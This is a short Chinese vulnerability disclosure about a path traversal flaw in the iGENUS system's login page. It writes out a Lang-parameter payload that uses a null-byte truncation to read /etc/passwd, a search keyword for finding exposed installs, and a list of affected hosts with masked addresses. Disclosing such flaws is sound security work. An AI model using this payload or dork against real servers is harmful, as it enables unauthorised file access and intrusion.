iGENUS系统某处任意文件遍历

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 开始提交的是看到http://**.**.**.**/bugs/wooyun-2010-0136712。还以为是重复了。仔细看看原来不是重复的。同样的是Lang存在遍历,%00截断 [<img src="https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1512334702f949e39b4debfdb999b46461677bf9.png) http://**.**.**.**//sys/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form 谷歌搜索关键字:iGENUS-系统管理中心 **.**.**.**:8090/sys/login.php?cmd=form [<img src="https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15123632cb53142c31aa62082b0b888379a1f6c1.png) 部分案例 http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form http://**.**.**.**:10000/sys/login.php?cmd=form http://**.**.**.**:8090/sys/login.php?cmd=form...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息